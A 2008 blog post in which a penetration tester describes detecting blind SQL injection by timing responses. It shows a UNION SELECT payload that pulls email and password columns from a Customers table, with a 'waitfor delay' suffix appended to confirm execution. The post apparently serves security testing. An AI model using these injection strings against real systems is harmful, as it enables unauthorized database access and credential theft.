Saturday, January 12, 2008

SQL Injection: Give yourself a little time...

I was recently involved in web application assessment and discovered something that I wanted to pass along. Keep in mind that this has probably been utilized before, but it is something that I just noticed so ... I wanted to throw it out for your amusement.

To set the stage, I had been looking at this application for quite some time and had an idea that SQL Injection might exist, but I was having much difficulty determining if the injection was actually present. The application was catching errors, displaying 404's, (etc) and really not displaying any good data to make a decision. So .... the question was ... if the application is catching our errors and really not giving us anything to work with ... how could we ask the question to the database to indicate if we were actually getting our requests processed by the database server?

Answer? Time!

Since the application is catching all of our attempts and not providing any good feedback the thought was ... let's come up with a way to have the database provide us an "indirect" response. To do this, I tried "waitfor". WAITFOR specifies a time, time interval, or event that triggers the execution of a statement block, stored procedure, or transaction.

Syntax: WAITFOR { DELAY 'time' TIME 'time' }

To implement 'waitfor', simply tag it onto the end of the injection test you're trying to accomplish. For example, if you're injection string is:

=> 30000' union select 1,email,password from Customers --

By implementing 'waitfor', your string might appear as....

=> 30000' union select 1,email,password from Customers waitfor delay '0:0:30' --

Keep in mind that while the injection results might not appear to your screen, you will experience a delay of the response back to the browser. The point here is to demonstrate that our injection is being accepted by the database server and that the injection is executing. So, while our injection string might not render results to the screen, we can test that the database server is executing our injection strings.